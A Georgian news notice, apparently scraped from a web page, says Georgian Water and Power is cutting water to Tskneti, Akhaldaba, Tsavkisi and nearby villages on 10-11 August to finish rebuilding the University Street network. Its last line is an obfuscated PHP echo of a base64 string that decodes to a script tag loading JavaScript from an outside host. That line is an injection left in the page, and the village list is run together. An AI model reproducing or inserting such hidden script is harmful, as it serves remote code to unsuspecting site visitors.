celsiusi
ავერსი საქკაბელი

10 აგვისტოს, ჯორჯიან უოთერ ენდ ფაუერი უნივერსიტეტის ქუჩის სრული რეაბილიტაციის ფარგლებში წყალმომარაგების ახალ ქსელზე გადაერთების ბოლო სამუშაოებს ჩაატარებს. 

ეაბილიტაციის ფარგლებში უნივერსიტეტის ქუჩაზე წყალმომარაგების სისტემა სრულად განახლდა - ჯამში 5.5 კმ-ზე მეტი სიგრძის წყალმომარაგების მაგისტრალური და გამანაწილებელი ქსელი შეიცვალა, 38 ერთეული ევროსტანდარტის ჩამკეტ-მარეგულირებელი ურდული დამონტაჟდა, 62 საკვანძო ჭა და  8 სახანძრო ჰიდრანტი მოეწყო.  

პროექტის საინვესტიციო ღირებულებამ 4 მილიონ ლარზე მეტი შეადგინა.

უნივერსიტეტის ქუჩაზე წყალმომარაგების ახალი ქსელის ექსპლუატაციაში შესვლის მიზნით, კომპანიის ტექნიკური ჯგუფები გადაერთებით სამუშაოებს დღეს, 10 აგვისტოს დილის 11:00  საათზე  დაიწყებენ და ინტენსიურ რეჟიმში შეასრულებენ.

გადაერთებითი სამუშაოების მიმდინარეობისას აუცილებელია მაგისტრალური ქსელის წყლისგან დაცლა, რის გამოც დღეს,  10 აგვისტოს, დილის 11:00 საათიდან, 11 აგვისტოს 17:00 საათამდე წყალმომარაგება შეეზღუდება:

წყნეთსსოფელ ახალდაბასდაბა წავკისსშინდისსკოჯორსკიკეთსბეთანის;  სოფლებს - კვესეთსტაბახმელასსამადლოს და დიდებას.

ჯორჯიან უოთერ ენდ ფაუერი ბოდიშს უხდის მომხმარებლებს დისკომფორტისთვის.
წყალმომარაგების სრულად აღდგენამდე კომპანია მოსახლეობას წყალს ცისტერნებით მიაწვდის.

წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას, ჯორჯიან უოთერ ენდ ფაუერი აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის - 2 93 11 11, ფეისბუქისა და ვებგვერდის მეშვეობით http://www.gwp.ge

 

230
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");